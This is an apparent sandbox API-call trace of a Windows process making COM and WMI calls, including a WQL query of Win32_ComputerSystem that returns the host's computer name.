	[0263.268] WbemLocator:IUnknown:QueryInterface (in: This=0x609213c, riid=0x6a311260*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5fae338 | out: ppvObject=0x5fae338*=0x5872bc) returned 0x0
	[0263.268] WbemLocator:IClientSecurity:SetBlanket (This=0x5872bc, pProxy=0x609213c, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x4, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0
	[0263.268] WbemLocator:IUnknown:Release (This=0x5872bc) returned 0x2
	[0263.268] WbemLocator:IUnknown:Release (This=0x5872dc) returned 0x1
	[0263.268] CoTaskMemFree (pv=0x586418) 
	[0263.268] WbemLocator:IUnknown:Release (This=0x608dee8) returned 0x0
	[0263.268] WbemLocator:IUnknown:QueryInterface (in: This=0x609213c, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5fadcf8 | out: ppvObject=0x5fadcf8*=0x5872dc) returned 0x0
	[0263.268] WbemLocator:IUnknown:QueryInterface (in: This=0x5872dc, riid=0x74774204*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x5fadcb4 | out: ppvObject=0x5fadcb4*=0x0) returned 0x80004002
	[0263.269] WbemLocator:IUnknown:QueryInterface (in: This=0x5872dc, riid=0x746a0b9c*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x5fadba8 | out: ppvObject=0x5fadba8*=0x0) returned 0x80004002
	[0263.270] WbemLocator:IUnknown:AddRef (This=0x5872dc) returned 0x3
	[0263.270] CoGetContextToken (in: pToken=0x5fadb40 | out: pToken=0x5fadb40) returned 0x0
	[0263.270] WbemLocator:IUnknown:QueryInterface (in: This=0x5872dc, riid=0x746523cc*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5fadb28 | out: ppvObject=0x5fadb28*=0x58723c) returned 0x0
	[0263.270] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x58723c, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x5fadb30 | out: pCid=0x5fadb30*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0
	[0263.270] WbemLocator:IUnknown:Release (This=0x58723c) returned 0x3
	[0263.270] CoGetContextToken (in: pToken=0x5fadb38 | out: pToken=0x5fadb38) returned 0x0
	[0263.270] WbemLocator:IUnknown:AddRef (This=0x5872dc) returned 0x4
	[0263.270] WbemLocator:IUnknown:QueryInterface (in: This=0x5872dc, riid=0x746a767c*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5fadbac | out: ppvObject=0x5fadbac*=0x5872c4) returned 0x0
	[0263.271] WbemLocator:IUnknown:Release (This=0x5872dc) returned 0x4
	[0263.271] WbemLocator:IRpcOptions:Query (in: This=0x5872c4, pPrx=0x5872dc, dwProperty=2, pdwValue=0x5fadbd0 | out: pdwValue=0x5fadbd0) returned 0x80004002
	[0263.271] WbemLocator:IUnknown:Release (This=0x5872c4) returned 0x3
	[0263.271] WbemLocator:IUnknown:Release (This=0x5872dc) returned 0x2
	[0263.271] CoGetContextToken (in: pToken=0x5fadfac | out: pToken=0x5fadfac) returned 0x0
	[0263.271] CoGetContextToken (in: pToken=0x5fadf6c | out: pToken=0x5fadf6c) returned 0x0
	[0263.271] WbemLocator:IUnknown:AddRef (This=0x5872dc) returned 0x3
	[0263.271] WbemLocator:IUnknown:QueryInterface (in: This=0x5872dc, riid=0x5fadfe8*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x5fadfe4 | out: ppvObject=0x5fadfe4*=0x609213c) returned 0x0
	[0263.271] WbemLocator:IUnknown:Release (This=0x5872dc) returned 0x3
	[0263.272] WbemLocator:IUnknown:Release (This=0x609213c) returned 0x2
	[0263.272] WbemLocator:IUnknown:Release (This=0x609213c) returned 0x1
	[0263.272] CoGetContextToken (in: pToken=0x5fae8c8 | out: pToken=0x5fae8c8) returned 0x0
	[0263.272] WbemLocator:IUnknown:AddRef (This=0x5872dc) returned 0x2
	[0263.272] WbemLocator:IUnknown:QueryInterface (in: This=0x5872dc, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5fae4ec | out: ppvObject=0x5fae4ec*=0x5872dc) returned 0x0
	[0263.272] WbemLocator:IUnknown:Release (This=0x5872dc) returned 0x2
	[0263.272] WbemLocator:IUnknown:Release (This=0x5872dc) returned 0x1
	[0263.273] CoGetContextToken (in: pToken=0x5fae0cc | out: pToken=0x5fae0cc) returned 0x0
	[0263.273] CoGetContextToken (in: pToken=0x5fae08c | out: pToken=0x5fae08c) returned 0x0
	[0263.273] WbemLocator:IUnknown:AddRef (This=0x5872dc) returned 0x2
	[0263.273] WbemLocator:IUnknown:QueryInterface (in: This=0x5872dc, riid=0x5fae108*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x5fae104 | out: ppvObject=0x5fae104*=0x609213c) returned 0x0
	[0263.273] WbemLocator:IUnknown:Release (This=0x5872dc) returned 0x2
	[0263.273] WbemLocator:IUnknown:AddRef (This=0x609213c) returned 0x3
	[0263.273] IWbemServices:ExecQuery (in: This=0x609213c, strQueryLanguage="WQL", strQuery="select * from Win32_ComputerSystem", lFlags=16, pCtx=0x0, ppEnum=0x5fae710 | out: ppEnum=0x5fae710*=0x6095074) returned 0x0
	[0263.281] IUnknown:QueryInterface (in: This=0x6095074, riid=0x6a311260*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5fae3bc | out: ppvObject=0x5fae3bc*=0x6095078) returned 0x0
	[0263.281] IClientSecurity:QueryBlanket (in: This=0x6095078, pProxy=0x6095074, pAuthnSvc=0x5fae404, pAuthzSvc=0x5fae400, pServerPrincName=0x5fae410, pAuthnLevel=0x5fae408, pImpLevel=0x5fae3f4, pAuthInfo=0x5fae3f8, pCapabilites=0x5fae3fc | out: pAuthnSvc=0x5fae404*=0xa, pAuthzSvc=0x5fae400*=0x0, pServerPrincName=0x5fae410, pAuthnLevel=0x5fae408*=0x6, pImpLevel=0x5fae3f4*=0x2, pAuthInfo=0x5fae3f8, pCapabilites=0x5fae3fc*=0x1) returned 0x0
	[0263.281] IUnknown:Release (This=0x6095078) returned 0x1
	[0263.281] IUnknown:QueryInterface (in: This=0x6095074, riid=0x6a311250*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5fae3b0 | out: ppvObject=0x5fae3b0*=0x5871ec) returned 0x0
	[0263.281] IUnknown:QueryInterface (in: This=0x6095074, riid=0x6a311260*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5fae3ac | out: ppvObject=0x5fae3ac*=0x6095078) returned 0x0
	[0263.282] IClientSecurity:SetBlanket (This=0x6095078, pProxy=0x6095074, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x4, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0
	[0263.283] IUnknown:Release (This=0x6095078) returned 0x2
	[0263.283] WbemLocator:IUnknown:Release (This=0x5871ec) returned 0x1
	[0263.284] CoTaskMemFree (pv=0x586388) 
	[0263.284] WbemLocator:IUnknown:Release (This=0x609213c) returned 0x2
	[0263.284] IUnknown:QueryInterface (in: This=0x6095074, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5fadd68 | out: ppvObject=0x5fadd68*=0x5871ec) returned 0x0
	[0263.284] WbemLocator:IUnknown:QueryInterface (in: This=0x5871ec, riid=0x74774204*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x5fadd24 | out: ppvObject=0x5fadd24*=0x0) returned 0x80004002
	[0263.285] WbemLocator:IUnknown:QueryInterface (in: This=0x5871ec, riid=0x746a0b9c*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x5fadc18 | out: ppvObject=0x5fadc18*=0x0) returned 0x80004002
	[0263.285] WbemLocator:IUnknown:AddRef (This=0x5871ec) returned 0x3
	[0263.286] CoGetContextToken (in: pToken=0x5fadbb0 | out: pToken=0x5fadbb0) returned 0x0
	[0263.286] WbemLocator:IUnknown:QueryInterface (in: This=0x5871ec, riid=0x746523cc*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5fadb98 | out: ppvObject=0x5fadb98*=0x58714c) returned 0x0
	[0263.286] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x58714c, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x5fadba0 | out: pCid=0x5fadba0*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0
	[0263.286] WbemLocator:IUnknown:Release (This=0x58714c) returned 0x3
	[0263.286] CoGetContextToken (in: pToken=0x5fadba8 | out: pToken=0x5fadba8) returned 0x0
	[0263.286] WbemLocator:IUnknown:AddRef (This=0x5871ec) returned 0x4
	[0263.286] WbemLocator:IUnknown:QueryInterface (in: This=0x5871ec, riid=0x746a767c*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5fadc1c | out: ppvObject=0x5fadc1c*=0x5871d4) returned 0x0
	[0263.286] WbemLocator:IUnknown:Release (This=0x5871ec) returned 0x4
	[0263.287] WbemLocator:IRpcOptions:Query (in: This=0x5871d4, pPrx=0x5871ec, dwProperty=2, pdwValue=0x5fadc40 | out: pdwValue=0x5fadc40) returned 0x80004002
	[0263.287] WbemLocator:IUnknown:Release (This=0x5871d4) returned 0x3
	[0263.287] WbemLocator:IUnknown:Release (This=0x5871ec) returned 0x2
	[0263.287] CoGetContextToken (in: pToken=0x5fae01c | out: pToken=0x5fae01c) returned 0x0
	[0263.287] CoGetContextToken (in: pToken=0x5fadfdc | out: pToken=0x5fadfdc) returned 0x0
	[0263.287] WbemLocator:IUnknown:AddRef (This=0x5871ec) returned 0x3
	[0263.287] WbemLocator:IUnknown:QueryInterface (in: This=0x5871ec, riid=0x5fae058*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x5fae054 | out: ppvObject=0x5fae054*=0x6095074) returned 0x0
	[0263.287] WbemLocator:IUnknown:Release (This=0x5871ec) returned 0x3
	[0263.287] IUnknown:Release (This=0x6095074) returned 0x2
	[0263.288] IUnknown:Release (This=0x6095074) returned 0x1
	[0263.288] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6092088, puCount=0x5fae9a8 | out: puCount=0x5fae9a8*=0x2) returned 0x0
	[0263.288] WbemDefPath:IWbemPath:GetText (in: This=0x6092088, lFlags=4, puBuffLength=0x5fae9a4*=0x0, pszText=0x0 | out: puBuffLength=0x5fae9a4*=0x17, pszText=0x0) returned 0x0
	[0263.288] WbemDefPath:IWbemPath:GetText (in: This=0x6092088, lFlags=4, puBuffLength=0x5fae9a4*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x5fae9a4*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0263.288] CoGetContextToken (in: pToken=0x5fae344 | out: pToken=0x5fae344) returned 0x0
	[0263.288] CoGetContextToken (in: pToken=0x5fae304 | out: pToken=0x5fae304) returned 0x0
	[0263.288] WbemLocator:IUnknown:AddRef (This=0x5871ec) returned 0x2
	[0263.288] WbemLocator:IUnknown:QueryInterface (in: This=0x5871ec, riid=0x5fae380*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x5fae37c | out: ppvObject=0x5fae37c*=0x6095074) returned 0x0
	[0263.288] WbemLocator:IUnknown:Release (This=0x5871ec) returned 0x2
	[0263.288] IUnknown:AddRef (This=0x6095074) returned 0x3
	[0263.289] IEnumWbemClassObject:Clone (in: This=0x6095074, ppEnum=0x5fae978 | out: ppEnum=0x5fae978*=0x609513c) returned 0x0
	[0263.290] IUnknown:QueryInterface (in: This=0x609513c, riid=0x6a311260*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5fae634 | out: ppvObject=0x5fae634*=0x6095140) returned 0x0
	[0263.290] IClientSecurity:QueryBlanket (in: This=0x6095140, pProxy=0x609513c, pAuthnSvc=0x5fae67c, pAuthzSvc=0x5fae678, pServerPrincName=0x5fae688, pAuthnLevel=0x5fae680, pImpLevel=0x5fae66c, pAuthInfo=0x5fae670, pCapabilites=0x5fae674 | out: pAuthnSvc=0x5fae67c*=0xa, pAuthzSvc=0x5fae678*=0x0, pServerPrincName=0x5fae688, pAuthnLevel=0x5fae680*=0x6, pImpLevel=0x5fae66c*=0x2, pAuthInfo=0x5fae670, pCapabilites=0x5fae674*=0x1) returned 0x0
	[0263.290] IUnknown:Release (This=0x6095140) returned 0x1
	[0263.290] IUnknown:QueryInterface (in: This=0x609513c, riid=0x6a311250*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5fae628 | out: ppvObject=0x5fae628*=0x5874bc) returned 0x0
	[0263.290] IUnknown:QueryInterface (in: This=0x609513c, riid=0x6a311260*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5fae624 | out: ppvObject=0x5fae624*=0x6095140) returned 0x0
	[0263.290] IClientSecurity:SetBlanket (This=0x6095140, pProxy=0x609513c, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x4, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0
	[0263.292] IUnknown:Release (This=0x6095140) returned 0x2
	[0263.292] WbemLocator:IUnknown:Release (This=0x5874bc) returned 0x1
	[0263.292] CoTaskMemFree (pv=0x586418) 
	[0263.292] IUnknown:Release (This=0x6095074) returned 0x2
	[0263.292] IUnknown:QueryInterface (in: This=0x609513c, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5fadfd0 | out: ppvObject=0x5fadfd0*=0x5874bc) returned 0x0
	[0263.293] WbemLocator:IUnknown:QueryInterface (in: This=0x5874bc, riid=0x74774204*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x5fadf8c | out: ppvObject=0x5fadf8c*=0x0) returned 0x80004002
	[0263.293] WbemLocator:IUnknown:QueryInterface (in: This=0x5874bc, riid=0x746a0b9c*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x5fade80 | out: ppvObject=0x5fade80*=0x0) returned 0x80004002
	[0263.294] WbemLocator:IUnknown:AddRef (This=0x5874bc) returned 0x3
	[0263.294] CoGetContextToken (in: pToken=0x5fade18 | out: pToken=0x5fade18) returned 0x0
	[0263.294] WbemLocator:IUnknown:QueryInterface (in: This=0x5874bc, riid=0x746523cc*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5fade00 | out: ppvObject=0x5fade00*=0x58741c) returned 0x0
	[0263.294] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x58741c, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x5fade08 | out: pCid=0x5fade08*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0
	[0263.294] WbemLocator:IUnknown:Release (This=0x58741c) returned 0x3
	[0263.295] CoGetContextToken (in: pToken=0x5fade10 | out: pToken=0x5fade10) returned 0x0
	[0263.295] WbemLocator:IUnknown:AddRef (This=0x5874bc) returned 0x4
	[0263.295] WbemLocator:IUnknown:QueryInterface (in: This=0x5874bc, riid=0x746a767c*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5fade84 | out: ppvObject=0x5fade84*=0x5874a4) returned 0x0
	[0263.295] WbemLocator:IUnknown:Release (This=0x5874bc) returned 0x4
	[0263.295] WbemLocator:IRpcOptions:Query (in: This=0x5874a4, pPrx=0x5874bc, dwProperty=2, pdwValue=0x5fadea8 | out: pdwValue=0x5fadea8) returned 0x80004002
	[0263.295] WbemLocator:IUnknown:Release (This=0x5874a4) returned 0x3
	[0263.296] WbemLocator:IUnknown:Release (This=0x5874bc) returned 0x2
	[0263.296] CoGetContextToken (in: pToken=0x5fae284 | out: pToken=0x5fae284) returned 0x0
	[0263.296] CoGetContextToken (in: pToken=0x5fae244 | out: pToken=0x5fae244) returned 0x0
	[0263.296] WbemLocator:IUnknown:AddRef (This=0x5874bc) returned 0x3
	[0263.296] WbemLocator:IUnknown:QueryInterface (in: This=0x5874bc, riid=0x5fae2c0*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x5fae2bc | out: ppvObject=0x5fae2bc*=0x609513c) returned 0x0
	[0263.296] WbemLocator:IUnknown:Release (This=0x5874bc) returned 0x3
	[0263.296] IUnknown:Release (This=0x609513c) returned 0x2
	[0263.296] IUnknown:Release (This=0x609513c) returned 0x1
	[0263.296] CoGetContextToken (in: pToken=0x5fae878 | out: pToken=0x5fae878) returned 0x0
	[0263.296] CoGetContextToken (in: pToken=0x5fae838 | out: pToken=0x5fae838) returned 0x0
	[0263.296] WbemLocator:IUnknown:AddRef (This=0x5874bc) returned 0x2
	[0263.297] WbemLocator:IUnknown:QueryInterface (in: This=0x5874bc, riid=0x5fae8b4*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x5fae8b0 | out: ppvObject=0x5fae8b0*=0x609513c) returned 0x0
	[0263.297] WbemLocator:IUnknown:Release (This=0x5874bc) returned 0x2
	[0263.297] IUnknown:AddRef (This=0x609513c) returned 0x3
	[0263.297] IEnumWbemClassObject:Reset (This=0x609513c) returned 0x0
	[0263.298] IUnknown:Release (This=0x609513c) returned 0x2
	[0263.299] CoGetContextToken (in: pToken=0x5fae76c | out: pToken=0x5fae76c) returned 0x0
	[0263.299] IUnknown:AddRef (This=0x609513c) returned 0x3
	[0263.299] IEnumWbemClassObject:Next (in: This=0x609513c, lTimeout=-1, uCount=0x1, apObjects=0x4f1530, puReturned=0x300cec4 | out: apObjects=0x4f1530*=0x608e398, puReturned=0x300cec4*=0x1) returned 0x0
	[0263.303] IUnknown:QueryInterface (in: This=0x608e398, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5fadd78 | out: ppvObject=0x5fadd78*=0x608e398) returned 0x0
	[0263.303] IUnknown:QueryInterface (in: This=0x608e398, riid=0x74774204*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x5fadd34 | out: ppvObject=0x5fadd34*=0x0) returned 0x80004002
	[0263.303] IUnknown:QueryInterface (in: This=0x608e398, riid=0x746a0b9c*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x5fadc28 | out: ppvObject=0x5fadc28*=0x0) returned 0x80004002
	[0263.304] IUnknown:AddRef (This=0x608e398) returned 0x3
	[0263.304] CoGetContextToken (in: pToken=0x5fadbc0 | out: pToken=0x5fadbc0) returned 0x0
	[0263.304] IUnknown:QueryInterface (in: This=0x608e398, riid=0x746523cc*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5fadba8 | out: ppvObject=0x5fadba8*=0x608e39c) returned 0x0
	[0263.304] IMarshal:GetUnmarshalClass (in: This=0x608e39c, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x5fadbb0 | out: pCid=0x5fadbb0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0
	[0263.304] IUnknown:Release (This=0x608e39c) returned 0x3
	[0263.304] CoGetContextToken (in: pToken=0x5fadbb8 | out: pToken=0x5fadbb8) returned 0x0
	[0263.304] IUnknown:AddRef (This=0x608e398) returned 0x4
	[0263.304] IUnknown:QueryInterface (in: This=0x608e398, riid=0x746a767c*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5fadc2c | out: ppvObject=0x5fadc2c*=0x0) returned 0x80004002
	[0263.304] IUnknown:Release (This=0x608e398) returned 0x3
	[0263.305] IUnknown:Release (This=0x608e398) returned 0x2
	[0263.305] CoGetContextToken (in: pToken=0x5fae018 | out: pToken=0x5fae018) returned 0x0
	[0263.305] CoGetContextToken (in: pToken=0x5fadfd8 | out: pToken=0x5fadfd8) returned 0x0
	[0263.305] IUnknown:AddRef (This=0x608e398) returned 0x3
	[0263.305] IUnknown:QueryInterface (in: This=0x608e398, riid=0x5fae054*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x5fae050 | out: ppvObject=0x5fae050*=0x608e398) returned 0x0
	[0263.305] IUnknown:Release (This=0x608e398) returned 0x3
	[0263.305] IUnknown:Release (This=0x608e398) returned 0x2
	[0263.305] IUnknown:Release (This=0x608e398) returned 0x1
	[0263.305] IUnknown:Release (This=0x609513c) returned 0x2
	[0263.306] CoGetContextToken (in: pToken=0x5fae8fc | out: pToken=0x5fae8fc) returned 0x0
	[0263.306] IUnknown:AddRef (This=0x608e398) returned 0x2
	[0263.306] IWbemClassObject:Get (in: This=0x608e398, wszName="__GENUS", lFlags=0, pVal=0x5fae978*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x5faea2c*=0, plFlavor=0x5faea28*=0 | out: pVal=0x5fae978*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x5faea2c*=3, plFlavor=0x5faea28*=64) returned 0x0
	[0263.306] IWbemClassObject:Get (in: This=0x608e398, wszName="__PATH", lFlags=0, pVal=0x5fae958*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x5faea10*=0, plFlavor=0x5faea0c*=0 | out: pVal=0x5fae958*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\ROOT\\cimv2:Win32_ComputerSystem.Name=\"XDUWTFONO\"", varVal2=0x0), pType=0x5faea10*=8, plFlavor=0x5faea0c*=64) returned 0x0
	[0263.306] SysStringLen (param_1="\\\\XDUWTFONO\\ROOT\\cimv2:Win32_ComputerSystem.Name=\"XDUWTFONO\"") returned 0x3c
	[0263.306] CoGetObjectContext (in: riid=0x2b5ad00*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x5fae9b0 | out: ppv=0x5fae9b0*=0x4a8dec) returned 0x0
	[0263.306] IComThreadingInfo:GetCurrentApartmentType (in: This=0x4a8dec, pAptType=0x5fae9a8 | out: pAptType=0x5fae9a8*=1) returned 0x0
	[0263.306] IUnknown:QueryInterface (in: This=0x4a8dec, riid=0x2b5ace8*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x5fae9ac | out: ppvObject=0x5fae9ac*=0x0) returned 0x80004002
	[0263.307] IUnknown:Release (This=0x4a8dec) returned 0x1
